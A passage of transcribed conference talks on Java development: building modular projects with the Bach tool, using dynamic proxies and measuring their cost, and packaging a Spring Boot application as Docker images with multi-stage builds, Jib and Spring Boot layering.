with a number. That's easy, so let's turn this around and flip it here, then clear the screen and build again. That's better. So let's see if we can store this application in a standalone image, defined here — it's a feature of Bach to generate a custom runtime image. Nice. Let's build it again and see. Well, there's a jlink call with all modules included. So is it really happening? We can check with a simple test: we go into the just created image in the workspace, there's a bin directory, and it has a java executable, which we can tell to list all the modules that are in this image. You can see there are only some of them, and our spacefx module. But because of a small bug, it contains the wrong version information.
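As an aside before fixing that: the module descriptor examined at the start of this demo could look roughly like the following sketch — the exact set of four JavaFX modules is my assumption (base, controls, graphics and media are typical for a JavaFX game), not taken from the talk:

// module-info.java (sketch; JavaFX module names assumed)
module spacefx {
    requires java.base;         // mandated, but may be written down explicitly
    requires javafx.base;
    requires javafx.controls;
    requires javafx.graphics;
    requires javafx.media;

    exports eu.hansolo.spacefx; // package containing the JavaFX application class
}
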
So let's do it with a clean call and then build it again. And after some calculations are done, we can show that the right modules are included in the image. Now let's start it: bin/spacefx — spacefx, it works. And to finish this, I want to tweak the custom runtime image and the modules that go into the jlink call, which is this class over here. Let's rebuild it, and you can see there's a launcher tweak going on. And now it's time to play — for a short second, that's it, that's all the time. Let's take a look at a project that already uses Bach to build its modules. It's called purejin, developed by Jan, and it's shared on GitHub. As you can see, there are a lot of modules defined in the root directory, and Jan also uses a GitHub Action to release a pre-release, or early access version, of purejin at GitHub Releases. You can see the modules, which you can download from here to see what purejin does, but we're going to inspect how he configured Bach to build purejin. So let's go back to the source code and see the Bach folder here: we have a build module directory and a project-info Java file. Here we see how he sets the name for the project and the current version. Ah, one interesting thing is that he targets Java SE 8 and tweaks some of the foundation tool calls, namely javac and javadoc, and he is also using JUnit to test his modules. So let's build purejin using Bach. There's a short description over here: we have to install a JDK after checking out the project, of course, and then we have to enter JShell; subsequent builds may be triggered by running the platform dependent build scripts, which are stored within this project — you can see them over here. So I prepared the checkout already. Let's enter a JShell session. Which version are we using? Let's ask the Java runtime: 16-EA build 32, that's fine. And now let's build the project. That doesn't just work yet, because we have to load Bach first: we have to open it and source it into this JShell session. We're going to open a JShell script from GitHub, from this repository, which is released as stable — download it from here, take this version 16.0.1 and boot Bach in this version. Here we go: reload it, Bach module downloaded and restarted. So now let's see. We have the shell environment imported from Bach and we can list the API provided by Bach. Here we go. And now we have the build command. We can trigger it, and we see Bach loaded the project from the project-info, and the build called some javac commands, packaged the modules with jar, generated the API documentation, and also compiled and executed the test modules. So far so good. Bach wrote all details into a logbook. Let's see what's in this logbook. Here we see Bach generated nine modules. We see the API of those modules here with their names and versions, which packages are exported and what services are provided, and that no main class is contained within a module. We see the sizes of each JAR and also the project descriptor that was generated by Bach based upon the module-info Java files found within the directory and the project-info annotation. The next section is the tool call overview, and here we see every detail of the arguments passed to the foundation tools. There are a lot of details; let's scroll over them. After packaging everything, javadoc is called, and it ends with two JUnit calls. And now, just to verify everything is working with plain tool calls.
Let's redo some commands on the command line with the post flag and we add the parameters copied from the logbook and we see everything is just working fine and as expected. So every other tool call the same. Here we see Java doc had emitted some warnings. Let's try to run this too. And here are the warnings so we can only call a single tool call, fix the warnings and don't have to repeat everything within the build. And last but not least also reports are generated running the unit tests. Here's the tree of all those tests with the summary almost 500 tests were executed successfully in less than a second. And this concludes this short introduction into Bach and let's have a look at the website. GitHub where Bach is hosted and I want you to discuss with me this tool over at the discussion page and maybe you are the first who opens a new thread here. So thanks for your time. Have fun and see you all.
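Bach drives the JDK foundation tools from Java itself; since Java 9 the standard mechanism for that is the ToolProvider SPI, and a minimal sketch of such a call looks like this (the arguments are illustrative, not the exact calls from the logbook):

import java.util.spi.ToolProvider;

class RunFoundationTool {
    public static void main(String... args) {
        // look up the javac tool shipped with the current runtime
        ToolProvider javac = ToolProvider.findFirst("javac").orElseThrow();
        // run() returns the tool's exit code; output goes to the given streams
        int code = javac.run(System.out, System.err,
                "--module-source-path", ".",
                "--module", "com.greetings,org.astro",
                "-d", "classes");
        System.out.println("javac exit code: " + code);
    }
}
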
Java build tools were developed before Java modules were around -- Bach builds (on(ly)) Java modules! The JDK contains a set of foundation tools 1 but none of them guides developers from processing Java source files into shippable products: be it a reusable modular JAR file with its API documentation or an entire custom (soon static 2) runtime image. There exists an implicit workflow encoded in the available options of the foundation tools. The (binary) output of one tool is the input of one or more tools. With the introduction of modules in Java 9 some structural parts of that workflow got a) promoted into the language itself and b) resulted in explicit module-related tool options. These structural information, encoded explicitly by developers in Java's module descriptors, can be used as basic building blocks when describing a modular Java project. I think of it as a "project-info.java" file -- which I don't propose to introduce (as a part of the language) -- but it helps to transport the basic idea.
10.5446/52794 (DOI)
Dynamic proxies were added to the language in Java 1.3, which is over 20 years ago, to solve a problem that we had: whenever we used infrastructure code like RMI and those types of things, we would have to go through a separate build process to generate stubs and skeletons so that we could access the remote objects. This was a bit of a pain, because if you forgot to call rmic after changing the interface, then things wouldn't really work very well together. So in Java 1.3 they added dynamic proxies, which allow you to create new objects of new classes that implement certain interfaces on the fly, and this made the whole infrastructure code much easier to do. And we can use them in our own code as well. With dynamic proxies, you've got a single invocation handler, which is called when any proxy method is called, so you can reduce the amount of code quite substantially that you have to write and maintain. In the biggest example, we took 600,000 code statements and replaced them with a single dynamic proxy — so it's a huge, huge win. And the code had not been written by hand, it had been generated, but after it was generated it had to be maintained by hand. Dynamic proxies are used a lot in different types of infrastructure code: Spring annotations, dependency injection, Hibernate, Gradle. We did a search through them, and dynamic proxies are used in lots of different places. And I've even written a book about it — so here's a book, you can get it for free from infoq.com slash minibooks slash java-dynamic-proxies. Before I show you how we can dynamically create proxies, I'm first going to show you how not to do it — how to do it by hand. The example I'm going to use is that of the virtual proxy. There are different forms of proxies; if you don't know the Proxy design pattern, I suggest you look it up. One of them is a virtual proxy, where you create something on demand. If you look at my office here, my desk has got a virtual tidy-up proxy: when I get visitors, I tidy up, but if there are no visitors, I don't tidy up. So I delay the tidying up until it's absolutely necessary. And my wife says, visitors are coming tomorrow, they're going to see your office — and then I tidy up. So I'm delaying an expensive object creation — tidying up my office — until the absolute last moment where I can get away with it. And it's always possible that the visitors say, we can't make it, in which case I can wait for the next visitor to arrive, and only then tidy up my office. So the idea with the virtual proxy is to delay expensive object creation until you absolutely need it, on demand. My CustomMap is similar to the Map interface; it's just six methods: size, get, put, remove, clear and forEach. The CustomHashMap implements CustomMap and delegates to a normal java.util.HashMap, so all six methods are delegated. I'm also printing out "custom hash map constructed" in the constructor, just so that we can see at what point it gets constructed. This code can be almost entirely generated by your IDE. And it continues: remove, clear, forEach, toString. Now this is of course repetitive and error prone — well, if you do it by hand, it's error prone; if the IDE does it, maybe it's not as error prone as doing it by hand, but it's still a pain. It's a pain to do coding like that. We'll get back to that in a moment. Now we are also going to do a virtual custom map.
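Before the virtual version, a condensed sketch of the hand-written delegation just described — the six method names come from the talk, while the generics and exact signatures are my guess, not the book's actual code:

import java.util.HashMap;
import java.util.Map;
import java.util.function.BiConsumer;

interface CustomMap<K, V> {
    int size();
    V get(K key);
    V put(K key, V value);
    V remove(K key);
    void clear();
    void forEach(BiConsumer<? super K, ? super V> action);
}

class CustomHashMap<K, V> implements CustomMap<K, V> {
    private final Map<K, V> map = new HashMap<>();
    public CustomHashMap() { System.out.println("custom hash map constructed"); }
    public int size() { return map.size(); }
    public V get(K key) { return map.get(key); }
    public V put(K key, V value) { return map.put(key, value); }
    public V remove(K key) { return map.remove(key); }
    public void clear() { map.clear(); }
    public void forEach(BiConsumer<? super K, ? super V> action) { map.forEach(action); }
}
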
This is a virtual proxy, which creates the real custom map when it's used for the first time. So when our constructed virtual custom map are passing a supplier and the supplier is used to create a custom map. So I pass in a supplier that's stored inside a final field. And then I've also passed in a real map and the real map, sorry, I don't pass in a real map. I have a real map field and the real map field is set inside the get real map method. The get real map method is a private method that if the real map is set to null, it creates it on demand. The first time we call it. So I've got my six methods here, size get put, remove, clear for each. Each of them now delegate to the get real map method. And the get real map will be, will set the map the first time that I call it and then create it. This is what the client code could look like. I would make a virtual custom map passing in a custom hash map constructor as a method reference. And then as soon as I start using it, you're going to see in the output that the custom hash map was created. So you see exactly at which point it gets created. After that, it's available and we can use it. And if you ever use it, then it also doesn't cost us anything. So that's one of the beauties of this pattern is expensive objects don't have to be constructed up front. We can only, we can do it only once we absolutely need it. Like Heinz tidying up his office only has to happen when I've got visitors, if I'm the visitors, well, then it doesn't matter. In my opinion. Nobody can see my mess. So I'll leave it like it is until the visitor comes. And at the current time with coronavirus, visitors are scarce. So my office is getting worse and worse and big mountains of cables and devices lying on my desk. You can probably relate to that. Now we've seen how to do it by hand. Let's see how we can do this with a dynamic proxy. And we want to avoid as much as possible either copying post programming because when you make a mistake, it gets copied everywhere. Secondly, we also want to avoid generating code with the IDE because well, it's it's just to maintain the code by hand. And if you make a change, you've got to make change, you've got to make you've got to change multiple places. And that's another problem with with that type of coding. So a better approach is either do static or dynamic code generation. And we're going to focus on the dynamic code generation. The method we call is proxy dot new proxy instance. And what this does is it takes three parameters. First of all, the class loader where the new proxy class is going to be loaded into once it's created, then an array containing all the interfaces that our proxy must implement. And then lastly, an invocation handler that is called when a proxy method is invoked. So these three. And we'll talk a bit more about the different constraints on these different classes. The invocation handler is called when any method is called on the proxy. It takes three parameters. The first parameter is the actual proxy object that on which methods were invoked. Then we've got method which is Java lang reflect method. I'll show you how that gets figured out in a moment. And then the arguments that were sent into that method. And that will be null if your method doesn't take any arguments. You also notice that we return objects so we can return anything. And the method throws throwable so we can throw anything as well. But it does have to match otherwise we get problems later on. 
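Put together, the creation call and the handler look roughly like this — a minimal sketch that reuses the CustomMap interface from the earlier sketch; returning null is fine for void and reference-returning methods, but it would fail for primitive return types:

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

public class MinimalProxyDemo {
    public static void main(String... args) {
        // called for every method invoked on the proxy
        InvocationHandler handler = (proxy, method, arguments) -> {
            System.out.println("called: " + method.getName());
            return null;
        };
        @SuppressWarnings("unchecked")
        CustomMap<String, String> map = (CustomMap<String, String>) Proxy.newProxyInstance(
                CustomMap.class.getClassLoader(),   // a class loader that can see the interface
                new Class<?>[] {CustomMap.class},   // the interfaces to implement
                handler);
        map.clear();                                // prints "called: clear"
    }
}
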
For our example, we'll have a look at logging information on method calls. The LoggingInvocationHandler is an invocation handler that's going to be called when any method is called on the proxy object, and we're also going to optionally measure the time that each method call takes. The log field — you know what that is, it's a Logger — and the object is the object on which we must invoke the methods. Here's the invoke method: log.info with information about the method and the parameters, and then, if we've got FINE level enabled, we're also going to log the time, the nanoTime. I've made that optional because nanoTime is a fairly expensive method to call, so we don't want to call it unnecessarily. And then we return method.invoke with the object and the arguments, and lastly we measure the time at the end and print out the time and the exiting of the method — so you see all this information. There is a mistake in this code and I've left it in there deliberately. If you can spot the mistake, good for you. If you can't, well, you'll have to wait, but there's a mistake. Then you've got the toString method, which is just there to format the method nicely — as you can see, the class of the method, the method itself, and the arguments that get passed in. Here's how we could use it. We could say Proxy.newProxyInstance, and for the class loader: the class loader has to be able to see the interface which we're going to be proxying. So if I'm proxying java.util.Map, I can use Map's class loader; if I'm using one of my own interfaces, I need to use my own class loader. I can't use the bootstrap class loader to load the class. Then I pass in the LoggingInvocationHandler as well, and we're going to log a ConcurrentHashMap. When I then call methods like put, you'll see entering and the time and exiting, and there we go. In order to see how this works, it helps to create the dynamic proxy and look at the generated code. We can do that by taking another interface, ISODateParser, and what this ISODateParser does is take a String and return a LocalDate — java.time.LocalDate from the date and time API — and it throws ParseException. So if it can't parse the string, it throws a ParseException; that's a checked exception. Now when I create a proxy with Proxy.newProxyInstance — because it's my own interface, I can't use the bootstrap class loader, so typically what I do is use the same class loader as the interface that I'm trying to proxy, so it's the ISODateParser's class loader — the invocation handler just returns null. So if you call any method, it's not going to work very well. But what I want to see with this object is what the actual class is, the getClass. And you can see, for example, it could be com.sun.proxy.$Proxy0. It doesn't have to be, but it normally follows something like that as a pattern: something, something, $Proxy0. It's like an anonymous class. And we can actually dump these to the file system when we run our code. So if you want to know whether your system is using dynamic proxies, you can just dump all the generated proxies, look at them and see exactly what has been proxied. Here are the settings for Java 9 and for earlier versions on how to save the generated files. And then we can decompile them with a tool like CFR — that's my favorite at the moment for decompiling Java classes.
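Before looking at the decompiled class, here is a hedged sketch of the logging handler described above — not the book's exact code — including the deliberate flaw: method.invoke() wraps exceptions from the target in an InvocationTargetException, and this version does not unwrap it. If memory serves, the dump switch mentioned here is -Djdk.proxy.ProxyGenerator.saveGeneratedFiles=true on Java 9+ and -Dsun.misc.ProxyGenerator.saveGeneratedFiles=true on Java 8 and earlier.

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.util.Arrays;
import java.util.logging.Level;
import java.util.logging.Logger;

public class LoggingInvocationHandler implements InvocationHandler {
    private final Logger log;
    private final Object obj;

    public LoggingInvocationHandler(Logger log, Object obj) {
        this.log = log;
        this.obj = obj;
    }

    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        log.info(() -> "Entering " + method.getName() + Arrays.toString(args == null ? new Object[0] : args));
        // only pay for nanoTime() when FINE logging is enabled
        long start = log.isLoggable(Level.FINE) ? System.nanoTime() : 0;
        try {
            // the deliberate mistake: exceptions thrown by the real method arrive here
            // wrapped in InvocationTargetException and are not unwrapped
            return method.invoke(obj, args);
        } finally {
            if (log.isLoggable(Level.FINE))
                log.fine(() -> "Exiting " + method.getName() + " after " + (System.nanoTime() - start) + " ns");
        }
    }
}
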
And this is what is generated. It's a public final class $proxy0. So it's final. We cannot extend it further. It extends proxy, which means it's a class that extends the Java lang reflect proxy. And therefore we can't extend other classes because Java does not support multiple class inheritance because it doesn't support multiple class inheritance. We also cannot support, we cannot proxy class. We can only proxy interfaces. And, and it implements ISO date parser. So it is an ISO date parser as well. Then it contains four methods fields. And the method fields are Java lang reflect method, m0, m1, m2, m3. And it then loads, it finds the methods for these classes. I think inside attorney, it actually does class.for name. But with the current class load, I guess. And then, but I just, I just decided to just to make it easy to show on the slide, I'm saying object.class.getMethod hash code. And object.class.getMethod equals comma object.class. And then string with odd parameters and parse, which takes a string parameter. And if any of those methods doesn't exist, we throw no such method error. So this is part of the, when the class is loaded for the first time, these method fields are discovered and stored inside the dollar proxy zero. And then we see the constructor, which takes an invocation handle as a parameter, and just pass it up to the superclass. And we can access it directly from inside dollar proxy zero. And then here's the hash code function, hash code, calls h, which is our invocation handler, dot invoke, this, which is the current proxy, comma the method m0, comma, because it's there no parameters for hash code, we pass null up to the invocation handler, but we cast it an object array. So it's clear what actually, what that is. Otherwise, you might think it's a, it's, it's, it's, it's actually a null argument that's being passed. But no, it's object array of null. And if a runtime exception occurs, or an error occurs, we simply re-throw those. If any other exception occurs, then we have to wrap that with an undeclared throwable exception. And then lies the problem with the logging invocation handler. Because what could happen is an invocation target exception, and in that case, we actually would rather throw the calls than the actual invocation target exception. Right, we'll get back to that in a moment. Then equals looks almost the same as hash code, except that we are also passing the parameter o to the invocation handler, and that is being wrapped as an object array. That object array might be eliminated, but not necessarily. Then we've got the two string method, which is almost exactly, almost exactly the same as hash code. So I'll skip that. And the parse method, which takes the string and returns a local date. Again, you have to cast the results to local date, because h.invoic returns an object. And then we, the other little difference is that this method declares that it throws parse exception. So we'll catch that together with runtime exception and error, and simply re-throw it. And anything else, we're going to throw them as undeclared throwable exceptions. All the methods are final, the class itself is final. We cannot extend it further. Let's see how we can create our own virtual dynamic proxy using this technique. So here's our virtual proxy handler. And the virtual proxy handler is an invocation handler, and I've also made it serializable. I'm not sure how this is going to be used. 
So rather safe than sorry: proxy objects themselves are already serializable, but the invocation handlers also have to be serializable. I've got a supplier inside and a subject inside, and the getSubject method, similarly to the hand-written virtual proxy, is going to construct the actual subject on demand when it is needed for the first time. So it says: if subject is null, then set subject equal to supplier.get(), and then return the subject. And then inside invoke — which gets called when any method is called on the interface, or hashCode, equals and toString, as we saw in the previous section — we simply say method.invoke on getSubject(), which will lazily create the actual subject, comma, the arguments. I've got a class called Proxies inside my book, described in there — so get the book if you haven't got it yet, and you'll see more information there. The virtualProxy method calls castProxy; we pass in the interface and a VirtualProxyHandler. And castProxy does three different things. The first is very obvious: it does a cast, it casts to the correct type. The second one is a bit more subtle: it will also unwrap an InvocationTargetException and throw the cause. So if you're doing any reflection, it would unwrap the InvocationTargetException and throw the cause rather than the InvocationTargetException. And the third thing it does is speed up the method calls. Instead of hand-writing our custom hash map virtual proxy, we can instead just say Proxies.virtualProxy, passing in the interface, which is CustomMap, and the supplier of the CustomHashMap, which would just be the CustomHashMap::new method reference. The rest of the code is exactly the same. So this is great: a lot less code and less chance of bugs — the less code you've got, the less opportunity you have for making mistakes. And everything works exactly like it did before. Dynamic proxies have some restrictions. For example, you can only proxy interfaces. We saw already that our proxy class extends java.lang.reflect.Proxy, and there's no multiple class inheritance in Java, so we can't proxy classes. If you need to do that, you need to use another library like cglib or Byte Buddy. But I personally don't like using those tools in production code — I don't mind for test code, but I don't like using them for production code. Then, as I mentioned to you, the UndeclaredThrowableException: the invocation handler's invoke method throws Throwable, but if we throw an exception which wasn't declared as part of the method signature, then the proxy is going to rethrow it as an UndeclaredThrowableException. For example, here inside my Runnable dynamic proxy, I'm throwing a bad exception, an IOException. Of course, Runnable doesn't expect to be throwing an IOException, so what comes back is an UndeclaredThrowableException that contains an IOException. So this is something to be aware of: if you throw the wrong exception, you're going to have a bit of an issue there. Also, the return types need to match the method signature. So if it's void, I can return anything; but if it's a primitive, it has to be that type, it can't be null; and if it's not a primitive, it has to be the correct type, because there's going to be some casting happening inside the proxy class, and that's going to give a ClassCastException if it's wrong.
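Going back to the virtual proxy handler and the Proxies helper just described, here is a hedged sketch of their shape — an approximation of the idea, not the actual code from the book (in this sketch the InvocationTargetException unwrapping happens in the handler rather than in castProxy):

import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.util.function.Supplier;

public class VirtualProxyHandler<S> implements InvocationHandler, Serializable {
    private final Supplier<? extends S> supplier;
    private S subject; // the real subject, created lazily on first use

    public VirtualProxyHandler(Supplier<? extends S> supplier) { this.supplier = supplier; }

    private S getSubject() {
        if (subject == null) subject = supplier.get(); // not thread-safe; enough for a sketch
        return subject;
    }

    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        try {
            return method.invoke(getSubject(), args);
        } catch (InvocationTargetException e) {
            throw e.getCause(); // rethrow the real exception, not the reflective wrapper
        }
    }

    @SuppressWarnings("unchecked")
    public static <T> T virtualProxy(Class<T> intf, Supplier<? extends T> supplier) {
        return (T) Proxy.newProxyInstance(intf.getClassLoader(),
                new Class<?>[] {intf}, new VirtualProxyHandler<>(supplier));
    }
}

Client code then shrinks to something like: CustomMap map = VirtualProxyHandler.virtualProxy(CustomMap.class, CustomHashMap::new);
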
These proxies are called potentially billions of times, because they are part of infrastructure code, so it's important that they are quite fast. There are a few places where performance might suffer. First of all, primitive types get boxed, both as parameters and as return values. Secondly, parameter lists might have to be wrapped with Object arrays. In some cases these can be eliminated by escape analysis, but not always: if they somehow escape from the method, or if escape analysis cannot determine precisely that it can eliminate them, then you still have the allocation cost. The third thing is that when you call a method by reflection, it always has to check whether you've got the permission to do that. It's like you call it and it says, who are you? And you go, well, I'm Heinz. Oh, okay, yeah, you can call the method. And then you call it again, and it says, excuse me, who are you? And you say, I'm Heinz. And they go, oh, okay, sorry, yeah, okay, you can call it. And then you call it a third time and it says, who are you? Come on, seriously. It's like some mental decline inside the method — it's horrible. However, if you call setAccessible(true) on the method, then after that it won't ask again, it'll just let you through. Because the methods are all public anyway, it really shouldn't make a difference setting them to be accessible, so we do that as a way to speed things up a bit — and it does make a difference. Our benchmark is going to have two very simple methods: increment, incrementing a long, and consumeCPU, which is just going to do Blackhole.consumeCPU(2). So it's very, very little work. And the reason I do such little work is because the way dynamic proxies are done in all the infrastructure code here is quite efficient, so if I did any more work, we wouldn't really be able to measure the difference between dynamic proxies and not using dynamic proxies. It's really fast, as we will see in a moment. Here's the analysis of the increment method. If I call it directly, it takes about 2.9 nanoseconds per operation. Now, this is running on my 16-inch MacBook Pro, but I turned off the CPU turbo boost so that it's always running at, I think, 2.4 or 2.5 gigahertz, so it doesn't wave up and down. Normally what happens is that your CPU will be clocked up if it has a lot of work, but if it gets too hot it'll get clocked down again, so heat and workload have a big impact on performance results, and it's just very hard to get consistent results that way. Also, what I did was choose the best results, not the average results, as these gave me the most accurate results. So the direct call was 2.9 nanoseconds. The static proxy was 3.5 — that's the handwritten one. Then the dynamic proxy direct call: here I'm cheating a little bit, because I'm using dynamic proxies, but I'm not using reflection to call the actual method, I'm just calling the correct method directly. The code's not actually correct, but it's fast, as you can see. Then the dynamic proxy reflective call with the methods being turbo boosted — that means I've set accessible to true on the methods: 9.7 nanoseconds versus the static proxy, which is 3.5. So that's the comparison we need to do between those two.
And if you don't have the turbo boosting on, the method turbo boosting, then it's another 2.3 nanoseconds slower. If you look at the results, in the rightmost column, you'll see that for the direct call, no bytes are generated. Also not for the static proxy, because it's just a primitive. So why should that allocate memory? And then our parameters, so it shouldn't allocate any memory. However, for the dynamic proxy, reflective call, it allocates 24 bytes on each method call. And it doesn't matter if escape analysis is on or off. It always allocates 24 bytes. And this object allocation is going to have an impact on our performance. Can't get away from that. Then the consume CPU, we can see the direct call 4.8.
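For context, the kind of JMH harness behind numbers like these looks roughly as follows — a sketch, not the speaker's actual benchmark; it reuses the virtualProxy helper sketched earlier, and Blackhole.consumeCPU(2) is the tiny bit of work mentioned above:

import org.openjdk.jmh.annotations.Benchmark;
import org.openjdk.jmh.annotations.Scope;
import org.openjdk.jmh.annotations.State;
import org.openjdk.jmh.infra.Blackhole;

@State(Scope.Benchmark)
public class ProxyBenchmark {
    public interface Worker {
        void increment();
        void consumeCPU();
    }

    public static class RealWorker implements Worker {
        private long counter;
        public void increment() { counter++; }
        public void consumeCPU() { Blackhole.consumeCPU(2); }
    }

    private final Worker direct = new RealWorker();
    private final Worker dynamicProxy = VirtualProxyHandler.virtualProxy(Worker.class, RealWorker::new);

    @Benchmark public void directIncrement()        { direct.increment(); }
    @Benchmark public void dynamicProxyIncrement()  { dynamicProxy.increment(); }
    @Benchmark public void directConsumeCPU()       { direct.consumeCPU(); }
    @Benchmark public void dynamicProxyConsumeCPU() { dynamicProxy.consumeCPU(); }
}
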
Java frameworks often need to dynamically create classes. One approach to do that easily in Java is dynamic proxies. In this talk, we will show how they compare to hand-written classes. We will then examine how we can use dynamic proxies to reduce the amount of code that we have to write.
10.5446/52797 (DOI)
Hi folks, welcome to this talk about containerizing Java applications. I'm Nicolas Fränkel. I'm a former developer, architect, whatever, and right now I work as a developer advocate. Since the trend around containerization started, I became very interested in Docker and Kubernetes and all the surrounding technologies. I work for a company called Hazelcast, and Hazelcast has two products. The main one is an in-memory data grid, and you can think about an in-memory data grid as distributed data structures: you can shard your data and replicate your data over different nodes of the network. The second one is Hazelcast Jet, an in-memory stream processing engine, which leverages the distributed nature of Hazelcast IMDG to do its stuff. Today I won't talk about Hazelcast, I will just use it, and I will talk about how we can containerize our Java app. So let's start with a non-Java app, with a Python application. How do you containerize a Python application? Well, it's quite straightforward, actually: you inherit from a Python image, you add the file that contains the dependencies, you install them, you add the script itself, and then you run the script, and it's done. Likewise for a Node.js application: you inherit from a Node.js image, you copy the file that contains the dependencies, you install the dependencies, and again you run the script. What all of those scripting languages have in common is that, well, there is no intermediate bytecode, there is no compile phase. So the main gist is to inherit from the right image, install the dependencies, and run the script. It's WYSIWYR — what you see is what you run. Whereas in Java, it's slightly more complicated, because we have several layers. Well, the first one is actually the JAR, which might contain all the JARs, depending on how you want to run it. And here I'm using Hazelcast as a dependency, but again, that's incidental. Then you have your JVM, and then you have Docker. In my sample app, I have a REST endpoint; I want to expose the REST endpoint to the outside world, so I can put and get data in Hazelcast. So how do we do it? Well, the easy way is to create the JAR outside of Docker — we just run mvn clean package — and then we have a Dockerfile that wraps it. Let's do it. So here I have my application. It's a Spring Boot application, because in the end I will show you how you can use it with Spring Boot, but it has only two dependencies: the web starter for the REST endpoint and Hazelcast. And then, nothing mind-blowing. It's just very straightforward, and the Dockerfile just says, hey, copy the JAR file and put it in the image, and then run java -jar with that JAR. So here I will be packaging the application with mvn clean package. Then I will build the image with the Dockerfile — and because I'm lazy, I've already done that; I won't do it every time, because with some of the later alternatives it can take quite some time. Here it's pretty straightforward, but later options can be quite time-consuming. And now I can docker run with --rm, because I don't want to keep the container in the end, and -p, because I want to expose the port to the outside world, and the image is called spring-in-docker:0.5. So the application starts, I have Hazelcast running in the background, and now I can check. I will put some data first: HTTP, localhost, 8080 — let me say world, it's a PUT, because I don't know my own application.
Now it works, and then I can curl to check that the data is still there, on 8080 — and yes, it's here. I can put another piece of data and say hello, Nicolas. And yes, I have my data. So that's the straightforward thing to do, and it works. But the issue here is that we actually need to build the JAR outside of Docker first, and then we use Docker to package the JAR, which is not super straightforward. So the next step is to run the entire build inside of Docker. Here I have my updated Dockerfile, and to run the build inside of Docker we actually need a compiler. So we inherit from a JDK and not a simple JRE, and we do our black magic: we copy the .mvn folder, because we are supposed to be self-contained, and we run the package phase, skipping the tests — because of course there are no tests, but anyway — and it works pretty well. And now if we do the same — I will get back to the terminal, stop this one, and run 1.0, because I already created it before — I can check that it still works: the data is still there, everything works as expected. And yes, it works, but there are several downsides, and the biggest downside is that we embed a JDK in the final image, which has two big issues. The first is an increased size — we want our Docker image to be as small as possible, when possible — and the biggest issue is actually the fact that it can compile Java code. So you will actually deliver in production an image that can compile code, and that's a huge security issue; you never want to do that. The second problem is about version handling. As you noticed, I need to set the version myself when I build the Docker image, so I need to remember that this version of the POM is the same as the version of the Docker build — I need to keep them both in sync at the same time. And finally, there is no layering. What do I mean by that? You know that Docker images are layered: you inherit from the base image and you add some more stuff, which creates another image; this image itself can be a parent image, and so on and so forth. And the idea is that Docker can keep the previous layers if they were not changed, if they were not touched — it doesn't need to rebuild them anymore. But now we have this JAR, and as soon as you change a library, as soon as you change a class file, as soon as you change anything, you need to rebuild the whole Docker image. So, how can we see that? Well, there is a nice tool called dive. What we will do is dive into the image, so I will stop it here, and I will dive into spring-in-docker:1.0. Takes a bit of time, of course. And here, this is how it looks. Here I inherit from this base image — you can see there was some installation going on, and I was not the one who copied several things — and here, this is what I did, this is what I added to my image, this is the mvn package where I skipped the tests. All the rest is inherited from the previous image. And here, this is the issue: this mvnw package step adds the whole thing in one layer, and as soon as I change anything, it will rebuild the whole image, including fetching the dependencies. As I mentioned, you need to redo everything, and part of the build is to fetch the dependencies. And it's not great fetching the dependencies every time, because as you know, Maven — like every build tool that relies on downloading JARs — downloads the whole internet through transitive dependencies, and here you can see that there are a lot of them.
So every transitive dependency is here, and we don't want that. So how can we do better? One way to do better is to use multi-stage builds. Multi-stage builds allow you, inside the same Dockerfile, to change the base image, so you can copy a file from a previous stage into your current stage. This is pretty widespread and it's really a great thing to use, but if you are using Skaffold — Skaffold is a tool that lets you configure your Docker builds to be automatically deployed to Kubernetes, either locally or remotely, probably locally — the problem with multi-stage builds is that they are not compatible with Skaffold, so be careful about that. Otherwise, this is how it looks. I will need to quit that — please let me quit, yes — and I will just use the multi-stage file here. So now I have two different stages — sorry about the semantics, not layers. The first stage is about building, and I'm using a JDK. And once I get the JAR, I use another stage where I use a simple JRE and I copy the JAR from the previous stage into this image. So I build this one, it's 1.1, and if we dive into it, as you can see, I have many, many fewer layers and, more importantly, I have one single JAR. I don't have the dependencies issue that I had before, which is a bit better. Still, I have this JAR layer, and the problem of this JAR layer is, again, that if I change a class file — which will happen all the time — I will need to rebuild everything. I don't need to fetch the dependencies, but I need to rebuild the JAR. So the next idea is to start thinking about the JAR as a distribution unit — but actually your Docker image is also a distribution unit, and they are pretty redundant. Without Docker, a JAR is the best distribution unit you can get, but with Docker images it is useless: instead of running a JAR inside a Docker image, why don't we just run the JAR exploded? And that's the train of thought of the people behind the Jib plugin, which is a standard Maven plugin. With Jib, you just configure your Maven POM to use Jib — it also works with Gradle — and it can either push to a remote Docker registry or to the local Docker daemon. You can add a lot of configuration options, including choosing the parent image, and it runs the exploded JAR, and there are a lot of benefits. Well, the first one is that there is no Dockerfile, because probably all your Java Dockerfiles will look the same, so there's no use repeating them over and over. The second benefit is that you have automated versioning from the POM: if your POM is version X, then Jib knows it will create version X of the Docker image. And then there are different layers: dependencies, resources and compiled code, the compiled code being the stuff that changes the most. And it's not useful to fetch the dependencies again or copy the resources again every time if only your code changes. So this layered way of doing things is actually the best, because if you change the code and compile it, you only change the uppermost layer — depending on how you look at things, the one at the bottom or at the top, whether your parent is at the top or at the bottom. So that's pretty smart, and actually in the latest version you have four layers: one is about snapshot dependencies, because snapshot dependencies are supposed to change more often than regular dependencies, so it handles that for you.
So let's do that, and let's see it here: I've removed the Dockerfile entirely — there is no Dockerfile anymore — but I've added the jib-maven-plugin. Here I'm telling it that it will create the image, and as you can see it syncs the image version with the project version, and the layers actually look very nice. So, remembering it's version 2.0, I will dive into it. And here you can see that you've got the parent stuff, and here you've got what the jib-maven-plugin created: the first layer is about the libraries, the second one is about the snapshot libraries — again, because they change more often — the third one is about the resources, so I have the files, and the final one is about the compiled code. So if I just need to change the compiled code, all the previous layers will be kept and the building of the image will be much, much faster. Also, with Jib you can configure things, for example change the parent image. So here I will be using an Alpine JRE image to keep the size of my final image smaller, and if I do docker images and grep for spring-in-docker, we can see here that I have version 2.0 and 2.1, and the 2.1 uses the Alpine parent image. So you can see I save a few megabytes, which can be a good thing if you want your images very small. The next option, if you've got a Spring Boot application, is to skip the Jib plugin entirely and use the Spring Boot mechanism. Spring Boot is also able to create a Docker image that is nicely layered, by default with the same layers as in Jib — the dependencies, the resources, the snapshot dependencies and the compiled code, in a different order though — and you can customize them. So if you know that some parts of your application are going to change much more often than others, you can have a 